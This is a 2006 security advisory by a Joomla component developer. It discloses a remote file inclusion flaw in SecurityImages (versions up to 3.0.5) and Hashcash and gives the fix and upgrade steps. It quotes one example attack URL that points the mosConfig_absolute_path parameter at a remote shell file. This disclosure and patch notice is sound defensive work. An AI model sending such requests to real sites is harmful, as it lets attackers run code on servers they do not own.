|
Tuesday, 01 August 2006 19:58 |
|
| |
|
The webmaster of janwiersma.com sent me an email today
at 6:12AM , his
server was hacked because of a bug in
securityimages. This bug allows a
remote atacker to
execute commands via remote forceful include and
execute function on your server
and affect ALL version of securityimages <= 3.0.5
Here are all files which put your server at risk:
client.php, configinsert.php, lang.php, server.php
Example of attack:
http://web/components/com_securityimages/
configinsert.php?mosConfig_absolute_path=http://shell.txt
from http://securityreason.com/exploitalert/892
Secunia has also a report on it: http://secunia.com/product/11186/
| In fact I forget to use that line in these files:
defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');
This avoid any requests to access directly this file.
- upgrade to 3.0.6 (download at Joomla Forge or in my download sections) OR
- patch the faulty files by hand (add defined('_VALID_MOS') or die('Direct Access to this location is not allowed.'); at the beginning of each file)
Please also contact all Your friends which are using securityimages!
And for my other components?
Hashcash 1.2.X is also affected: http://secunia.com/product/11046/ and my patch is avalaible!
- upgrade to 1.2.2 (download at Joomla Forge or in my download sections) OR
- patch the faulty files by hand (add defined('_VALID_MOS') or die('Direct Access to this location is not allowed.'); at the beginning of each file)
JoomlaCloud is NOT affected
|
YOU ARE ALL URGE TO UPGRADE ASAP!
Related Posts
-
Just in case I take too much time to deliver a ready to use download, duration 5 minutes, but you need to understand basic php coding Create a temporary directory c:\patch Copy an existing patch distribution, under a new name For example, lets download Joomla_1.5.13-Stable-Full_PackageForSecurityImages5.1.x_v01.01.00.zip into c:\patch\
395 days ago
-
Only for SecurityImages 5.1.x and Joomla! 1.5.13 Allow login views, login modules, register, lost password, lost user account and contact section to be protected by SecurityImages Are for Joomla! 1.5.13 only and SecurityImages 5.1.x or later 14 files has been altered, mostly views, and com_contact/com_user controller, click on picture
405 days ago
-
Only for SecurityImages 5.1.x and Joomla! 1.5.12 Allow login views, login modules, register, lost password, lost user account and contact section to be protected by SecurityImages Are for Joomla! 1.5.12 only and SecurityImages 5.1.x or later 14 files has been altered, mostly views, and com_contact/com_user controller, click on picture
427 days ago
-
This version should improve installations on some host, where the plugin securityimages.php did not always install properly. The reason behind is that I did add falsely an additional file index.html in plugin.zip. This may lead to permissions issues during installation. SecurityImages 5.1.2 do not contains any other changes, so If you’re happil
427 days ago
-
The Joomla! community is pleased to announce the immediate availability of Joomla! 1.5.11 Since Joomla 1.5.11 is released...Here are the new patches for SecurityImages 5.1.1 AND Joomla! 1.5.11 Allow login views, login modules, register, lost password, lost user account and contact section to be protected by SecurityImages Are for J
458 days ago
-
The Joomla! community is pleased to announce the immediate availability of Joomla! 1.5.10 Since Joomla 1.5.10 is released...Here are the new patches for SecurityImages 5.1.1 Allow login views, login modules, register, lost password, lost user account and contact section to be protected by SecurityImages Are for Joomla! 1.5.10 only
524 days ago
-
Following the Preview of SecurityImages 5.2.0, I am currently developing a proof of concept using the Ajax library JQUERY jQuery is a fast and concise JavaScript Library that simplifies HTML document traversing, event handling, animating, and Ajax interactions for rapid web development. jQuery is designed to change the way that you write Jav
570 days ago
-
Some people have reported issue in the forum I've found the error in my code in some views but not all: img src="/<?php echo JURI :: root() ?>/index.php? as a result, there is in image URL a double / which cause issues on some web host (no image displayed) I now provide a new patches versions for Joomla! 1.5.8 and 1.5.9 that
592 days ago
-
The Joomla! community is pleased to announce the immediate availability of Joomla! 1.5.9 Since Joomla 1.5.9 is released...Here are the new patches for SecurityImages 5.1.0 Allow login views, login modules, register, lost password, lost user account and contact section to be protected by SecurityImages Are for Joomla! 1.5.9 only
599 days ago
-
An insight at securityimages 5.2.0 still in development, as usual, all comments are welcome either in this post or in my forum NEW: fonts are now auto detected, and a better widget is now available for selecting them, sorry still no font preview in php ;-) You can install your own true type fonts at /administrator/components/com_securityimages
640 days ago
relatedArticles
|
|
Last Updated on Thursday, 17 August 2006 21:54 |
|
Tags
Module Jetbrains Teamcity for Joomla!